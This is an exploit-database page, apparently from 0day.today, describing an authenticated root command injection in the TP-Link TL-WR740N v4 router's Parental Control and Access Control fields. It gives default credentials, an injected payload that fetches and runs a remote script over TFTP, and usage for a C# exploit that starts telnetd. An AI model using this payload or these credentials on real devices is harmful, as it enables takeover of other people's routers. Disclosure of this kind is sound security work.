0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
TP-Link TL-WR740N v4 Router (FW-Ver. 3.16.6 Build 130529 Rel.47286n) - Command Execution
Vulnerability description: The domain name parameters of the "Parental Control" and "Access Control" features of the TP-Link TL-WR740N v4 (FW-Ver. 3.16.6 Build 130529 Rel.47286n) router are prone to arbitrary shell command execution as root for users who are authenticated against the web interface. Each shell payload is restricted up to 28 bytes. The "Parental Control" feature allows you to specify 8 domains (= 8 commands) so you have 8 x 28 = 244 bytes of shell commands. This is sufficient to post-load and execute a shell script of arbitrary length from a tftp server. Employing this method one can gain full control over the device when post-loading a mightier busybox MIPS binary and executing telnetd or using netcat to connect back. Default login credentials are known to be root:5up, Admin:5up or ap71:. Technical Cause: The web interface and the whole routing logic on the device is controlled by a single homebrew process (httpd) running as root. This binary is employing various fopen() and system() calls in order to configure the device. One of these calls refers to a script (/tmp/wr841n/parent.sh) being filled with user input data from the "Parental Control" mask. ... iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source 00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls USER INPUT HERE,return1 -j RETURN iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source 00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls ANOTHER USER INPUT HERE,return1 -j RETURN ... The input data is only poorly checked by some JavaScript functions but the server accepts most characters. Entering a shell command surrounded by ';' will result in code execution: ... iptables -A FORWARD_PARENTCTRL -i br0 -m mac --mac-source 00:AF:FE:22:FE:AF -p tcp --dport 80 -m multiurl --urls ;tftp -gr a 192.168.0.1;,;sh a;,return1 -j RETURN ... The same goes for the Access Control Feature. The only difference is that the script name is /tmp/wr841n/accessCtrl.sh. The attack is persistent until resetting the parental control or access control settings. After rebooting the device will execute the commands again. This vulnerability may or may not affect other TP-Link hardware and software versions. However it was only tested against TP-Link TL-WR740N v4 (FW-Ver. 3.16.6 Build 130529 Rel.47286n) within the local network. Exploit POC code description: The exploit tries to load and execute a shell script called 'a' (for attack) from the specified tftpd server. This is for the circumventing the length restriction of 28 bytes and the fact that the preloaded busybox binary is a bit restricted (no netcat and telnetd available). The 'a' script then loads a mightier busybox (filename busyboxx) binary from the tftp server specified in that 'a' script (default 192.168.0.1). It also sets up a more comfortable environment and starts telnetd as well as a ftp server. You can then connect to the router via telnet and ftp. The exploit code is written in C# (.NET 4.5) so you need .NET Framework 4.5 to execute it. Usage: ParentalControlExploit.exe [/a | /p] [RouterIp] [RouterWebIfaceUsername] [RouterWebIfacePassword] [TFTPServerIp] TP-Link TL-WR740N v4 parental control and access control exploit. 2014 by C. Kuhl. Options: /a Use Access Control Exploit /p Use Parental Control Exploit [RouterIp] IP of the target to attack (default 192.168.0.1) [Username] Username of the Webinterface Login (default admin) [Password] Username of the Webinterface Login (default admin) [TFTPServer] TFTP Host where the 'a' shell file is hosted for execution Example: ParentalControlExploit.exe /a 192.168.0.1 admin admin 192.168.0.100 # 0day.today [2024-10-05] #